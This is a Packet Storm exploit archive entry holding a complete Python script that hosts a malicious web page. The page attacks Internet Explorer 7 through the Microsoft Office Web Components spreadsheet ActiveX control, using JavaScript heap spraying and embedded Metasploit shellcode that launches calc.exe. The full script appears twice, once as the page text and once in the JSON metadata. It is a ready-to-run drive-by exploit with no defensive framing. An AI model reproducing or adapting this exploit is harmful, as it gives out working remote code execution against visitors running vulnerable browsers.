Search...

Microsoft Office Web Active-X Exploit

2009-07-21T00:00:00

ID PACKETSTORM:79463
Type packetstorm
Reporter Ahmed Obied
Modified 2009-07-21T00:00:00

Description

                                        
                                            `#  
# Author : Ahmed Obied (ahmed.obied@gmail.com)  
#   
# - Based on the code posted at http://www.milw0rm.com/exploits/9163  
# - Tested using:  
# &gt; Internet Explorer 7.0.5730.13 on Windows XP SP3 with owc10.dll installed  
# &gt; Internet Explorer 7.0.5730.13 on Windows XP SP3 with owc11.dll installed  
#  
# Usage : python ie_owc.py [port (between 1024 and 65535)]  
#   
  
import sys  
import socket  
  
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler  
  
class RequestHandler(BaseHTTPRequestHandler):  
  
def convert_to_utf16(self, payload):  
# From Beta v2.0 by Berend-Jan Wever  
# http://www.milw0rm.com/exploits/656  
enc_payload = ''  
for i in range(0, len(payload), 2):  
num = 0  
for j in range(0, 2):  
num += (ord(payload[i + j]) & 0xff) &lt;&lt; (j * 8)  
enc_payload += '%%u%04x' % num  
return enc_payload  
  
def get_payload(self):  
# win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub  
# http://metasploit.com  
payload = '\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73'  
payload += '\x13\x6f\x02\xb1\x0e\x83\xeb\xfc\xe2\xf4\x93\xea\xf5\x0e'  
payload += '\x6f\x02\x3a\x4b\x53\x89\xcd\x0b\x17\x03\x5e\x85\x20\x1a'  
payload += '\x3a\x51\x4f\x03\x5a\x47\xe4\x36\x3a\x0f\x81\x33\x71\x97'  
payload += '\xc3\x86\x71\x7a\x68\xc3\x7b\x03\x6e\xc0\x5a\xfa\x54\x56'  
payload += '\x95\x0a\x1a\xe7\x3a\x51\x4b\x03\x5a\x68\xe4\x0e\xfa\x85'  
payload += '\x30\x1e\xb0\xe5\xe4\x1e\x3a\x0f\x84\x8b\xed\x2a\x6b\xc1'  
payload += '\x80\xce\x0b\x89\xf1\x3e\xea\xc2\xc9\x02\xe4\x42\xbd\x85'  
payload += '\x1f\x1e\x1c\x85\x07\x0a\x5a\x07\xe4\x82\x01\x0e\x6f\x02'  
payload += '\x3a\x66\x53\x5d\x80\xf8\x0f\x54\x38\xf6\xec\xc2\xca\x5e'  
payload += '\x07\x7c\x69\xec\x1c\x6a\x29\xf0\xe5\x0c\xe6\xf1\x88\x61'  
payload += '\xd0\x62\x0c\x2c\xd4\x76\x0a\x02\xb1\x0e'  
return self.convert_to_utf16(payload)  
  
def get_exploit(self):  
exploit = '''  
  
function spray_heap()  
{  
var chunk_size, payload, nopsled;  
  
chunk_size = 0x100000;  
payload = unescape("&lt;PAYLOAD&gt;");  
nopsled = unescape("&lt;NOP&gt;");  
while (nopsled.length &lt; chunk_size)  
nopsled += nopsled;  
nopsled_len = chunk_size - (payload.length + 20);   
nopsled = nopsled.substring(0, nopsled_len);  
heap_chunks = new Array();  
for (var i = 0 ; i &lt; &lt;CHUNKS&gt; ; i++)  
heap_chunks[i] = nopsled + payload;  
}   
  
function trigger_bug()  
{  
var obj, arr;  
  
try {  
obj = new ActiveXObject("OWC10.Spreadsheet");  
} catch (err) {   
try {  
obj = new ActiveXObject("OWC11.Spreadsheet");   
} catch (err) {  
window.location = 'about:blank';   
}  
}  
arr = new Array();  
arr.push(1);  
arr.push(2);  
arr.push(0);  
arr.push(window);  
for (var i = 0 ; i &lt; arr.length ; i++) {  
for (var j = 0 ; j &lt; 10 ; j++) {  
try {  
obj.Evaluate(arr[i]);  
} catch (err) {}  
}  
}   
window.status = arr[3] + "";  
for (var j = 0 ; j &lt; 10 ; j++) {  
try {  
obj.msDataSource(arr[3]);  
} catch (err) {}  
}  
}  
  
spray_heap();  
trigger_bug();  
  
'''  
exploit = exploit.replace('&lt;PAYLOAD&gt;', self.get_payload())  
exploit = exploit.replace('&lt;NOP&gt;', '%u0b0c%u0b0c')  
exploit = exploit.replace('&lt;CHUNKS&gt;', '100')   
exploit = '&lt;html&gt;&lt;body&gt;&lt;script&gt;' + exploit + '&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;'  
return exploit   
  
def log_request(self, *args, **kwargs):  
pass  
  
def do_GET(self):  
try:  
if self.path == '/':  
print  
print '[-] Incoming connection from %s' % self.client_address[0]  
self.send_response(200)   
self.send_header('Content-Type', 'text/html')  
self.end_headers()  
print '[-] Sending exploit to %s ...' % self.client_address[0]  
self.wfile.write(self.get_exploit())  
print '[-] Exploit sent to %s' % self.client_address[0]  
except:   
print '[*] Error : an error has occured while serving the HTTP request'  
exit_program()  
  
def exit_program():  
print '[-] Exiting ...'  
sys.exit(0)  
  
def main():  
if len(sys.argv) != 2:  
print 'Usage: %s [port (between 1024 and 65535)]' % sys.argv[0]  
sys.exit(0)  
try:  
port = int(sys.argv[1])  
if port &lt; 1024 or port &gt; 65535:  
raise ValueError  
try:  
serv = HTTPServer(('', port), RequestHandler)  
ip = socket.gethostbyname(socket.gethostname())  
print '[-] Web server is running at http://%s:%d/' % (ip, port)  
try:  
serv.serve_forever()  
except:  
exit_program()  
except socket.error:  
print '[*] Error : a socket error has occurred'  
exit_program()   
except ValueError:  
print '[*] Error : an invalid port number was given'  
exit_program()  
  
if __name__ == '__main__':  
main()  
  
`

JSON Vulners Source

Initial Source

{"hash": "0734c227f678b9d7960a1b86c62a85b38c1506a844c12a8426f1d610842c573b", "edition": 1, "references": [], "objectVersion": "1.2", "viewCount": 0, "type": "packetstorm", "description": "", "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/79463/Microsoft-Office-Web-Active-X-Exploit.html", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "5a08cc1cb41dca185f109f42e35aba60"}, {"key": "modified", "hash": "6e74cbd2638253438b2471ba1b6bdfb5"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "6e74cbd2638253438b2471ba1b6bdfb5"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "2fa8789e9777086fbd827ca05f34e296"}, {"key": "sourceData", "hash": "5d13208a813d7afb36d9a1155b0150bb"}, {"key": "sourceHref", "hash": "adb1511d64a8b53a243f6bff99953940"}, {"key": "title", "hash": "24e015c777c0ce6f7a3fde3883f28805"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "published": "2009-07-21T00:00:00", "modified": "2009-07-21T00:00:00", "title": "Microsoft Office Web Active-X Exploit", "cvelist": [], "sourceHref": "https://packetstormsecurity.com/files/download/79463/msofficeweb-activex.txt", "history": [], "reporter": "Ahmed Obied", "lastseen": "2016-11-03T10:26:48", "cvss": {"vector": "NONE", "score": 0.0}, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "sourceData": "`# \n# Author : Ahmed Obied (ahmed.obied@gmail.com) \n# \n# - Based on the code posted at http://www.milw0rm.com/exploits/9163 \n# - Tested using: \n# > Internet Explorer 7.0.5730.13 on Windows XP SP3 with owc10.dll installed \n# > Internet Explorer 7.0.5730.13 on Windows XP SP3 with owc11.dll installed \n# \n# Usage : python ie_owc.py [port (between 1024 and 65535)] \n# \n \nimport sys \nimport socket \n \nfrom BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler \n \nclass RequestHandler(BaseHTTPRequestHandler): \n \ndef convert_to_utf16(self, payload): \n# From Beta v2.0 by Berend-Jan Wever \n# http://www.milw0rm.com/exploits/656 \nenc_payload = '' \nfor i in range(0, len(payload), 2): \nnum = 0 \nfor j in range(0, 2): \nnum += (ord(payload[i + j]) & 0xff) << (j * 8) \nenc_payload += '%%u%04x' % num \nreturn enc_payload \n \ndef get_payload(self): \n# win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub \n# http://metasploit.com \npayload = '\\x31\\xc9\\x83\\xe9\\xdd\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73' \npayload += '\\x13\\x6f\\x02\\xb1\\x0e\\x83\\xeb\\xfc\\xe2\\xf4\\x93\\xea\\xf5\\x0e' \npayload += '\\x6f\\x02\\x3a\\x4b\\x53\\x89\\xcd\\x0b\\x17\\x03\\x5e\\x85\\x20\\x1a' \npayload += '\\x3a\\x51\\x4f\\x03\\x5a\\x47\\xe4\\x36\\x3a\\x0f\\x81\\x33\\x71\\x97' \npayload += '\\xc3\\x86\\x71\\x7a\\x68\\xc3\\x7b\\x03\\x6e\\xc0\\x5a\\xfa\\x54\\x56' \npayload += '\\x95\\x0a\\x1a\\xe7\\x3a\\x51\\x4b\\x03\\x5a\\x68\\xe4\\x0e\\xfa\\x85' \npayload += '\\x30\\x1e\\xb0\\xe5\\xe4\\x1e\\x3a\\x0f\\x84\\x8b\\xed\\x2a\\x6b\\xc1' \npayload += '\\x80\\xce\\x0b\\x89\\xf1\\x3e\\xea\\xc2\\xc9\\x02\\xe4\\x42\\xbd\\x85' \npayload += '\\x1f\\x1e\\x1c\\x85\\x07\\x0a\\x5a\\x07\\xe4\\x82\\x01\\x0e\\x6f\\x02' \npayload += '\\x3a\\x66\\x53\\x5d\\x80\\xf8\\x0f\\x54\\x38\\xf6\\xec\\xc2\\xca\\x5e' \npayload += '\\x07\\x7c\\x69\\xec\\x1c\\x6a\\x29\\xf0\\xe5\\x0c\\xe6\\xf1\\x88\\x61' \npayload += '\\xd0\\x62\\x0c\\x2c\\xd4\\x76\\x0a\\x02\\xb1\\x0e' \nreturn self.convert_to_utf16(payload) \n \ndef get_exploit(self): \nexploit = ''' \n \nfunction spray_heap() \n{ \nvar chunk_size, payload, nopsled; \n \nchunk_size = 0x100000; \npayload = unescape(\"<PAYLOAD>\"); \nnopsled = unescape(\"<NOP>\"); \nwhile (nopsled.length < chunk_size) \nnopsled += nopsled; \nnopsled_len = chunk_size - (payload.length + 20); \nnopsled = nopsled.substring(0, nopsled_len); \nheap_chunks = new Array(); \nfor (var i = 0 ; i < <CHUNKS> ; i++) \nheap_chunks[i] = nopsled + payload; \n} \n \nfunction trigger_bug() \n{ \nvar obj, arr; \n \ntry { \nobj = new ActiveXObject(\"OWC10.Spreadsheet\"); \n} catch (err) { \ntry { \nobj = new ActiveXObject(\"OWC11.Spreadsheet\"); \n} catch (err) { \nwindow.location = 'about:blank'; \n} \n} \narr = new Array(); \narr.push(1); \narr.push(2); \narr.push(0); \narr.push(window); \nfor (var i = 0 ; i < arr.length ; i++) { \nfor (var j = 0 ; j < 10 ; j++) { \ntry { \nobj.Evaluate(arr[i]); \n} catch (err) {} \n} \n} \nwindow.status = arr[3] + \"\"; \nfor (var j = 0 ; j < 10 ; j++) { \ntry { \nobj.msDataSource(arr[3]); \n} catch (err) {} \n} \n} \n \nspray_heap(); \ntrigger_bug(); \n \n''' \nexploit = exploit.replace('<PAYLOAD>', self.get_payload()) \nexploit = exploit.replace('<NOP>', '%u0b0c%u0b0c') \nexploit = exploit.replace('<CHUNKS>', '100') \nexploit = '<html><body><script>' + exploit + '</script></body></html>' \nreturn exploit \n \ndef log_request(self, *args, **kwargs): \npass \n \ndef do_GET(self): \ntry: \nif self.path == '/': \nprint \nprint '[-] Incoming connection from %s' % self.client_address[0] \nself.send_response(200) \nself.send_header('Content-Type', 'text/html') \nself.end_headers() \nprint '[-] Sending exploit to %s ...' % self.client_address[0] \nself.wfile.write(self.get_exploit()) \nprint '[-] Exploit sent to %s' % self.client_address[0] \nexcept: \nprint '[*] Error : an error has occured while serving the HTTP request' \nexit_program() \n \ndef exit_program(): \nprint '[-] Exiting ...' \nsys.exit(0) \n \ndef main(): \nif len(sys.argv) != 2: \nprint 'Usage: %s [port (between 1024 and 65535)]' % sys.argv[0] \nsys.exit(0) \ntry: \nport = int(sys.argv[1]) \nif port < 1024 or port > 65535: \nraise ValueError \ntry: \nserv = HTTPServer(('', port), RequestHandler) \nip = socket.gethostbyname(socket.gethostname()) \nprint '[-] Web server is running at http://%s:%d/' % (ip, port) \ntry: \nserv.serve_forever() \nexcept: \nexit_program() \nexcept socket.error: \nprint '[*] Error : a socket error has occurred' \nexit_program() \nexcept ValueError: \nprint '[*] Error : an invalid port number was given' \nexit_program() \n \nif __name__ == '__main__': \nmain() \n \n`\n", "id": "PACKETSTORM:79463"}